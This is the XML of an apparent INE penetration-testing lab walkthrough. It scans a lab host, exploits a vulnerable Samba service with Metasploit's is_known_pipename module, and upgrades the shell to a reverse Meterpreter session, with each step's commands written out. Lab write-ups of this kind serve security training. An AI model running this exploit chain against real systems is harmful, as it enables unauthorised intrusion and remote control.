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C8879" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E3B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9C6F7B" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:t>In this lab environment, you will be provided with GUI access to a Kali machine. The target machine running a vulnerable service will be accessible at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004E3B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6DC69C" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E3B71">
        <w:t xml:space="preserve"> Exploit the vulnerable service using suitable Metasploit module and then upgrade the command shell session to a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t xml:space="preserve"> session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118E1314" w14:textId="7EF0D8B0" w:rsidR="00853ABF" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E3B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB7003F" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E3B71">
        <w:t> Open the lab link to access the Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3991640D" w14:textId="47D3BEEF" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DEEBB52" wp14:editId="5B911A3F">
            <wp:extent cx="5943600" cy="3373755"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2074898196" name="Picture 20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82788" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E3B71">
        <w:t> Check if the target machine is reachable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D159F5" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2274E5C5" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:t xml:space="preserve">ping -c 4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="799F8144" w14:textId="200F00D6" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A9FE309" wp14:editId="5B2C8665">
            <wp:extent cx="5943600" cy="1854835"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="75490779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07796" name="Picture 7549077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1193" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:t>The target is reachable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C2289D" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E3B71">
        <w:t> Port scanning with Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9D04C0" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:t xml:space="preserve">To begin with, we will need to identify a vulnerable service running on the target system. This can be done by performing a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t>service version</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t xml:space="preserve"> detection scan with Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CBFAF0" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0066A414" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7CB15367" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:t xml:space="preserve">As shown in the following screenshot, the Nmap scan reveals a vulnerable version of SAMBA running on port 445 that can be exploited </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t>through the use of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t xml:space="preserve"> a Metasploit module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D982D7" w14:textId="66058830" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D467A64" wp14:editId="5790529B">
            <wp:extent cx="5943600" cy="2397125"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="153722896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28960" name="Picture 15372289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5409" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E3B71">
        <w:t> Gaining Access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0DC69F" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t>In order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t xml:space="preserve"> use this exploit module, we will need to start up the Metasploit Framework Console (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t>), this can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A898413" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189C9D3A" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B48891F" w14:textId="70D5B1BD" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6150F9B9" wp14:editId="29C73D8D">
            <wp:extent cx="5943600" cy="3783965"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1194713202" name="Picture 17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135F1" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:t xml:space="preserve">After starting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t>, we can load the module by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673F238F" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4409F3" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:t>use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t>/samba/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t>is_known_pipename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="50952039" w14:textId="0355C2DB" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C20F4D9" wp14:editId="060EB9DE">
            <wp:extent cx="5943600" cy="1595120"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="210312715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27158" name="Picture 21031271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A9C9" w14:textId="1C8502AE" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35C48C87" wp14:editId="22E4E1CA">
            <wp:extent cx="5855001" cy="590580"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="165743470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34707" name="Picture 16574347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5D42" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:t>We will now need to configure the module options, more specifically, we will need to set the target. This can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467A93A1" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677E5B7B" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="75886F46" w14:textId="3528F785" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="768D9FF3" wp14:editId="1FD0D6A5">
            <wp:extent cx="5943600" cy="546735"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1564922960" name="Picture 15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1B85C" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:t>After configuring the module options, we can execute the exploit module by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAA5280" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272BD15E" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570BC6F5" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:t>As shown in the following screenshot, the exploit module runs successfully and provides us with a command shell session on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DC8D9A" w14:textId="7A623856" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="26D131D7" wp14:editId="1FAC072C">
            <wp:simplePos x="914400" y="36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413125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="685859947" name="Picture 2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59947" name="Picture 25" descr="A screenshot of a computer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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25183F6B" wp14:editId="648408AE">
            <wp:extent cx="2921150" cy="882695"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="148763196" name="Picture 26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3196" name="Picture 26" descr="A black rectangular object with white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13CAA" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 5:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E3B71">
        <w:t xml:space="preserve"> Upgrading command shells to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t xml:space="preserve"> shells.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F11902" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:t>Now that we have obtained access to the target system via a command shell, we can put the session in the background by running the following keyboard combination:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30590DA3" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636CEA9F" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:t>CTRL + Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6471CFBE" w14:textId="183CCE5E" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="160D5D50" wp14:editId="7B524FEB">
            <wp:extent cx="5943600" cy="623570"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="989027855" name="Picture 13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BA122" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:t>We can now load the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E3B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shell_to_meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t> module by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A191E1" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186660BF" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:t>use post/multi/manage/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t>shell_to_meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2A9A4A8B" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:t>We will now need to configure the module options, more specifically, the LHOST and SESSION ID options, this can be done by running the following commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2A7116" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:t>Make sure to replace LHOST with the IP address of your Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03415AD9" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D46E210" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235B789A" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:t>set LHOST 192.212.191.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072E6F03" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:t>We can now run the module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B656902" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7A3DEE" w14:textId="2D9DF2DA" w:rsidR="004E3B71" w:rsidRDefault="00F56B0B" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="004E3B71" w:rsidRPr="004E3B71">
        <w:t>un</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014090F8" w14:textId="35D4AB86" w:rsidR="00F56B0B" w:rsidRDefault="00F56B0B" w:rsidP="004E3B71">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AC4F16C" wp14:editId="19295FE9">
            <wp:extent cx="5943600" cy="2759710"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="39137849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78499" name="Picture 3913784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F050" w14:textId="4588DEE2" w:rsidR="00F56B0B" w:rsidRPr="004E3B71" w:rsidRDefault="00F56B0B" w:rsidP="004E3B71">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EDB6057" wp14:editId="46F2E342">
            <wp:extent cx="5943600" cy="3729355"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1492048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4830" name="Picture 1492048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A2E3" w14:textId="32B9D3CF" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19C1889A" wp14:editId="2026608A">
            <wp:extent cx="5943600" cy="1753870"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="212070221" name="Picture 12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3A69F" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:t xml:space="preserve">We can now interact with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t xml:space="preserve"> session by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDBF888" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DA39EC" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:t>sessions 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EECD545" w14:textId="77777777" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="004E3B71" w:rsidP="004E3B71">
      <w:r w:rsidRPr="004E3B71">
        <w:t xml:space="preserve">As shown in the following screenshot, we can now interact with the target system with a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E3B71">
        <w:t xml:space="preserve"> shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBE9D4C" w14:textId="5761DECA" w:rsidR="004E3B71" w:rsidRPr="004E3B71" w:rsidRDefault="00F56B0B" w:rsidP="004E3B71">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60ACCA64" wp14:editId="783C3F36">
            <wp:extent cx="5943600" cy="3679190"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="154857962" name="Picture 29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7962" name="Picture 29" descr="A computer screen shot of a black screen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59DF" w14:textId="7787444D" w:rsidR="004E3B71" w:rsidRDefault="00F56B0B">
      <w:r>
        <w:t>Exit that session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73051F01" w14:textId="137DE45E" w:rsidR="00F56B0B" w:rsidRDefault="00F56B0B">
      <w:r>
        <w:t>Now upgrade using session command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485D9ABF" w14:textId="2214EB4A" w:rsidR="00F56B0B" w:rsidRDefault="00F56B0B">
      <w:r>
        <w:t>Session -u 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043359C3" w14:textId="4CCC4455" w:rsidR="00F56B0B" w:rsidRDefault="00F56B0B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53664FE3" wp14:editId="1B416361">
            <wp:extent cx="5943600" cy="4436110"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="80434288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42884" name="Picture 80434288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59BF" w14:textId="6B5C0596" w:rsidR="00F56B0B" w:rsidRDefault="00F56B0B">
      <w:r>
        <w:t>Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E23BF5A" w14:textId="772C60BF" w:rsidR="00F56B0B" w:rsidRDefault="00F56B0B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
